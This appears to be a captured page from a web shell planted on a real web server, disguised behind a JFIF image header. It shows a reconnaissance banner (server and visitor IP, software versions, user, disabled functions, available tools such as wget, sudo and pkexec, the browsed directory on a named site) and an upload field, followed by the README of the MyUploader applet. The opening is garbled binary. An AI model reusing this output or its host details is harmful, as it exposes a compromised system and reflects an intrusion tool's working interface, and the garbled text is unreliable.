????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 216.73.216.25 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/var/www/icad.astacus.se/customerzon/myuploader-free/php/ |
Upload File : |
INSTALLATION MYUPLOADER WITH PHP 1) Start an FTP Client 2) Open a connection to your server 3) Upload the entire 'myuploader' directory 4) Change the permissions of the subdirectory 'myuploader/uploaded-files' to 757 (owner: rwx, group rx, other rwx) VERIFYING 1) Open a browser 2) Enter the url http://<your-domain>/myuploader/upload.html 3) Upload a file 4) Go to your FTP Client 5) Check if the file is stored in the directory 'myuploader/uploaded-files' SAMPLE APPLICATIONS See for more sample applications: http://www.javaatwork.com/java-upload-applet/samplecode.html FAQ 1) Where can I find the FAQ of MyUploader? See: http://www.javaatwork.com/java-upload-applet/faqs.html INTERNATIONALIZATION MyUploader is available in 18 languages: - Chinese Simplified(zh_CN) - Chinese Traditional(zh_TW) - Danish(da) - Dutch(nl) - English(en) - Finnish(fi) - Greek(el) - Icelandic(is) - Italian(it) - French(fr) - German(de) - Korean(ko) - Norwegian(no) - Polish(pl) - Portuguese(pt) - Spanish(es) - Swedish(sv) - Turkish(tr) INSTALLING A LANGUAGE PACK 1) Open the upload.html file with a text editor 2) Add the name of one of the labels_<xx>.jar files to the archive param. The labels_<xx>.jar files are stored in the internationalization directory The <xx> represents the language code. 3) Add the the parameter <param name="language" value="<xx>"> to the html page below the successURL parameter. 4) Change the <xx> to your own language code. 5) Save the file 6) Open an FTP Client 7) Upload the upload.html file to your server 8) Upload the labels_<xx>.jar file to your server.